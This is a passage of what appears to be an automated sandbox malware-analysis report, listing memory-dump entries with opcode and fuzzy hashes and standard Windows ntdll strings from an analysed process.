                                                                                                    • Opcode Fuzzy Hash: 4af704851bc909d95c29df4d79ad224ae379ddbf419649d6783c4dfbedc15c34
                                                                                                    • Instruction Fuzzy Hash: A711C436A441469FD701CF58C810B92BBBAFB6A714F08815DE989CF316D736EC81CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                    • Instruction ID: ba48b38fc30e5e64d5d64c9c6e089ee6bc9820c7043ccf0d15f7b35f7bf01557
                                                                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                    • Instruction Fuzzy Hash: 0701D8327005108BEB058A1DE884F827767BFC5710F5955AEED458F25EEAB1DC81C790
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ecdeb069298119331f3997b032178f3c1cfa9f7aa5c11535a99058286e167130
                                                                                                    • Instruction ID: 5f3e8782acee10f66829f168eea12c25ffc13b1c2fc88473f222172bcd34ab27
                                                                                                    • Opcode Fuzzy Hash: ecdeb069298119331f3997b032178f3c1cfa9f7aa5c11535a99058286e167130
                                                                                                    • Instruction Fuzzy Hash: 49112977900019EBDB15DB98CC80DDFBB7DEF48254F044166E906E7211EA34EA15CBE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8e62263e7f9259b7976bbf9a3a389d1048b9b82ab1bb669b1c3d316f99f88ea
                                                                                                    • Instruction ID: 0fc83ccf43e5a69bfb3269ccf6f95e5788ec935a8b79491173fe2ebfd61d6849
                                                                                                    • Opcode Fuzzy Hash: a8e62263e7f9259b7976bbf9a3a389d1048b9b82ab1bb669b1c3d316f99f88ea
                                                                                                    • Instruction Fuzzy Hash: F0019E32A00158ABCB10DFA9CD44EAFBFBAFB58650F090059F545E3251C634DA11CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b409f0dccc1ee0be23f24da18318f8055e3d8230d5be8de3bc9551f8b8aff4da
                                                                                                    • Instruction ID: cbc08ae8169e34bcfb62062b25f08ecfadb5efc30ca73693a09c014bf6d11c5d
                                                                                                    • Opcode Fuzzy Hash: b409f0dccc1ee0be23f24da18318f8055e3d8230d5be8de3bc9551f8b8aff4da
                                                                                                    • Instruction Fuzzy Hash: 6A01A272701910BFE3019B7DCD80E57BBADFF94AA4B010629F208876A9DB24EC11C6E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cb38295a208d65e5e02f445bc5ba27ec4ba758ea9f8a544d527e20c53412a76e
                                                                                                    • Instruction ID: d466412086c2aa7a153f49dc5ad674d2bba2f7b634aa9c956f4f33700c2aba97
                                                                                                    • Opcode Fuzzy Hash: cb38295a208d65e5e02f445bc5ba27ec4ba758ea9f8a544d527e20c53412a76e
                                                                                                    • Instruction Fuzzy Hash: A6F0276F9196904BDB139F3464B03816BB6F762950F49208DDCE2B7345C6788583CA21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e408195dee0c3bc2ef6c6bf668df6296664acd77035cf46c2453d5b9480a17c
                                                                                                    • Instruction ID: 6d94e974fd99f174122f51ca377b9a465cfed79d11cbfb1dd53d7625d52d2745
                                                                                                    • Opcode Fuzzy Hash: 8e408195dee0c3bc2ef6c6bf668df6296664acd77035cf46c2453d5b9480a17c
                                                                                                    • Instruction Fuzzy Hash: 1EF0EC72712A90DFD3138B1CC14CB637BEEAB817A0F0895A6E81D87652C764D880CA51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                    • Instruction ID: 7c0032eb0a44b7ffcb43cd8326e1903f2a7c4abd762fb08bea49f71a07b1fadf
                                                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                    • Instruction Fuzzy Hash: C1E092323006006BE7518E5D8C80F477B6F9F96B10F01007AB9045E255C9EA9C0986A4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                    • Instruction ID: 1a33347ff590ef2f77b6225363a14bbc5e8893266b33df224292561cc1b8b648
                                                                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                    • Instruction Fuzzy Hash: 8AF03072704204DFE3218F05D940F42B7E9EB05765F45C069E6099B561D37DEC40CBA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                    • Instruction ID: a1885615ee327d5a1b58ef6b4b00e13e56814568f8d997187dc4071b52c0edff
                                                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                    • Instruction Fuzzy Hash: D7F0303A2047449BE706CE1AD050A86BBA6FB55360B044099EC858B351D675E982CF55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                    • Instruction ID: 8c33b63b8de9db577da22333b429bb00f72f6af09d3c792bd06a21862f6a96f0
                                                                                                    • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                    • Instruction Fuzzy Hash: 6AF0A0B12C029AAFEB058F09C900F153F9AAB0072EF008419F9488A092C774D984CBA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                    • Instruction ID: 834c882e5624d39f344112f2391168f922219932c45c530b0debea84353191b7
                                                                                                    • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                    • Instruction Fuzzy Hash: 62F08C30209A21DFE7315F1EDC41F027BA2BF40720F058A5EE1660B8F4CB65AC82CB94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                    • Instruction ID: d60010c6ef6fe6b08be4fe1ea3b15802879edd57d06d942a421ef9cbb0bde0d2
                                                                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                    • Instruction Fuzzy Hash: 71E0DF32A00120FFEF228799CD01F9A7EADEB94EA0F010158B604E70A4D930DE00C690
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62750d1f2214e5f0d6c723783625505a90cbe7caeb5b9c4d90007721645ce9f2
                                                                                                    • Instruction ID: 0e48d52eca5a535fd3c25f30a0708e12b850f34dd53735f6b516f26a05d298eb
                                                                                                    • Opcode Fuzzy Hash: 62750d1f2214e5f0d6c723783625505a90cbe7caeb5b9c4d90007721645ce9f2
                                                                                                    • Instruction Fuzzy Hash: A8F09B319266B14FE353CB28E680F767BE5BF10670F56059CD44587A16E724FD82C650
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7d341727f723af0e2ba7c09f7d8ec62af74ea18982ecd36a4208e2c101656437
                                                                                                    • Instruction ID: f1b6488310a5e28ecadb9ad4ab19f58df4f5a4fd247125fc3d31e10482febe3c
                                                                                                    • Opcode Fuzzy Hash: 7d341727f723af0e2ba7c09f7d8ec62af74ea18982ecd36a4208e2c101656437
                                                                                                    • Instruction Fuzzy Hash: 1BE0923472E5604BCF124B2896247783BD3AB01690B4414D9EA4CAB642C729D803EA60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                    • Instruction ID: 3e097fc7b5d9cca32083e97b0f870fd3489b14fec8c104c399290bf42b300927
                                                                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                    • Instruction Fuzzy Hash: 0AE06531010A10DBE7325B26EC08B92BAE2BF50791F10882DE1DB059B4C7B5A8C0CA80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 62e6bb3ed0513542a8b2ced04a79a0141f58a5dd0bfb963edf5d768810cec5d4
                                                                                                    • Instruction ID: e9ffe8f3a0b534ef071513f4141e5e25477c16c71f94af86da32a7341afc34ac
                                                                                                    • Opcode Fuzzy Hash: 62e6bb3ed0513542a8b2ced04a79a0141f58a5dd0bfb963edf5d768810cec5d4
                                                                                                    • Instruction Fuzzy Hash: D7E092321005549BD711EB2DDD05F8A7BABEB60760F054615B1565B1A4CA34A850C7C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                    • Instruction ID: 7d4926925703476c13166c291084ad2289b044f75d793749901a6cdd36a6e4f9
                                                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                    • Instruction Fuzzy Hash: B8E052793003459FD705CF19C054B667BB6FFD5A50F24C069A9488F20AEB36E842CB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                    • Instruction ID: c2b7cf7df3aef8489157de2cc471955c5884fde8aad667426a618c20fa71bee3
                                                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                    • Instruction Fuzzy Hash: 8CE0CD31158920DFE7311F1DDC04F5176A3FF54B50F154A6AE0411A0AC87759CC1CBD4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                    • Instruction ID: db6bc8f59b344d046e432a8e2a2dc2c9c9f282197bd709155e3a6a7379187ab2
                                                                                                    • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                    • Instruction Fuzzy Hash: B6E08631106631EFE7315F1ADD04F42B6A3AB50B54F05846AA001064F496B89889CED5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 55b987a0df60f9db8fc1749690e169fd19873cfc44de0aebbe59bcfa307d6fba
                                                                                                    • Instruction ID: 36aaf7f9a3ec3c9c65028763a909e53aa098bd216c059dcab7c85336d0a70e2a
                                                                                                    • Opcode Fuzzy Hash: 55b987a0df60f9db8fc1749690e169fd19873cfc44de0aebbe59bcfa307d6fba
                                                                                                    • Instruction Fuzzy Hash: 7351F7B2B005567FDB51DF9C9C9097FFBB9BB08204751816AE454DB64AD239DF008BE0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 4cdec458a454c052ca8ca209bacc26014617b3f81fb8f4c15fa9357e5b2cbe06
                                                                                                    • Instruction ID: 06918b3ae0cb8bf36695afbb17e925c5f60c644485de525a34d936f2e07dbae9
                                                                                                    • Opcode Fuzzy Hash: 4cdec458a454c052ca8ca209bacc26014617b3f81fb8f4c15fa9357e5b2cbe06
                                                                                                    • Instruction Fuzzy Hash: DA513971B00645AFDB21EF5CD894A7FBBFAEB44300B40845EE4D6CB685D674EA40CB60
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 24D24787
                                                                                                    • ExecuteOptions, xrefs: 24D246A0
                                                                                                    • Execute=1, xrefs: 24D24713
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 24D24655
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 24D24742
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 24D24725
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 24D246FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: d6e26b83880d5a13b47c32e1339ea0a34bd15230c5d041d33394a2cf88646d72
                                                                                                    • Instruction ID: dec7d73647089f52b150019e048a12b570bae40595b001d8d8d033e21d7d1f4f
                                                                                                    • Opcode Fuzzy Hash: d6e26b83880d5a13b47c32e1339ea0a34bd15230c5d041d33394a2cf88646d72
                                                                                                    • Instruction Fuzzy Hash: 78510931701619BAEB11DBADDC95FBA77AEEF14304F0400E9E709AB191EB319A458F50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-$0$0
                                                                                                    • API String ID: 1302938615-699404926
                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction ID: de5bcf485baaa5e736f3fa5f5f2b75a9dd26d45975a9d127022a642822b955a3
                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction Fuzzy Hash: 4281B070E456498EDB898F6CCC91BEEBBB3AF85350F16415BD850A72D1E73C9940CB60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                    • API String ID: 48624451-2819853543
                                                                                                    • Opcode ID: 1d5fbe1c2a6ac8b0d7a5307f08308ebbb0002111b6778d7c4cae3d3d4f5c03bb
                                                                                                    • Instruction ID: 951293e6fc170b21471f9993e5d87fa30fae6ee282ebcf841568470d5ce52b56
                                                                                                    • Opcode Fuzzy Hash: 1d5fbe1c2a6ac8b0d7a5307f08308ebbb0002111b6778d7c4cae3d3d4f5c03bb
                                                                                                    • Instruction Fuzzy Hash: BD215E76E00119ABDB01EFA9DC50AEE7BF9FF64644F45012AEA05E7204E734DA018FA1
                                                                                                    Strings
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 24D202E7
                                                                                                    • RTL: Re-Waiting, xrefs: 24D2031E
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 24D202BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                    • API String ID: 0-2474120054
                                                                                                    • Opcode ID: ea3afcfe104015cfe48f9ca0225dec5a59928b96179fc712fcbd80da468c796a
                                                                                                    • Instruction ID: 79db519b2d91c3c7528f0e71cfe339bf7abaf9796a5e9b5b9c3f81c2ee16f2be
                                                                                                    • Opcode Fuzzy Hash: ea3afcfe104015cfe48f9ca0225dec5a59928b96179fc712fcbd80da468c796a
                                                                                                    • Instruction Fuzzy Hash: EDE1B031608741DFD712CF28C880B5ABBE2BF89318F140A6DF6968B2E2D775D945CB52
                                                                                                    Strings
                                                                                                    • RTL: Resource at %p, xrefs: 24D27B8E
                                                                                                    • RTL: Re-Waiting, xrefs: 24D27BAC
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 24D27B7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 0-871070163
                                                                                                    • Opcode ID: 9516dcea789e9df9b68303f4e44d5fc9c1caefa02916d6a75e37b8b52a14eb26
• Instruction ID: 89e6367939d93e38f34609f40691bc33b23f1f5592f4e67c170d97ef06266bc3
• Opcode Fuzzy Hash: 9516dcea789e9df9b68303f4e44d5fc9c1caefa02916d6a75e37b8b52a14eb26
• Instruction Fuzzy Hash: 6641E135705B029FD725CE29C850B7AB7E6FF98710F000A2DF95ADB681EB31E9058B91
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24D2728C
Strings
• RTL: Resource at %p, xrefs: 24D272A3
• RTL: Re-Waiting, xrefs: 24D272C1
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 24D27294
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: f68b28156189b52dee229cd20a4ada08ab1f26b61dd6ba52bc295fcb0508b690
• Instruction ID: eb7596b8d48f212862e1aa6048e6bb00f0c790b3c8d42f8bc820353b2a6fd2d1
• Opcode Fuzzy Hash: f68b28156189b52dee229cd20a4ada08ab1f26b61dd6ba52bc295fcb0508b690
• Instruction Fuzzy Hash: 0041F235700A16ABD721CE29CC41F66B7E6FF54714F10061DF959EB281EB31E8528BE1
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: d7ac431a5492d99cfa648e385fc62c851965cc0d1f26a2059637427e1bfc376f
• Instruction ID: 30c6bb1b693fa588ce93126a3e2c06eb42accf276d058748f02c02a6e8314bdd
• Opcode Fuzzy Hash: d7ac431a5492d99cfa648e385fc62c851965cc0d1f26a2059637427e1bfc376f
• Instruction Fuzzy Hash: 23318472A002299FDB10DE2DDC50BEE77B9FB54610F80459EE949E7244EB30EA448FA1
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: 7d277ad4833f9e239383612cfd2f86501565974ebf456ec594ce9a516ad63b2e
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 8F91C670E01A069FDB94CF6DCC80AAEBBA3FF44720F62452BE955E72C5D73889418720
Strings
Memory Dump Source
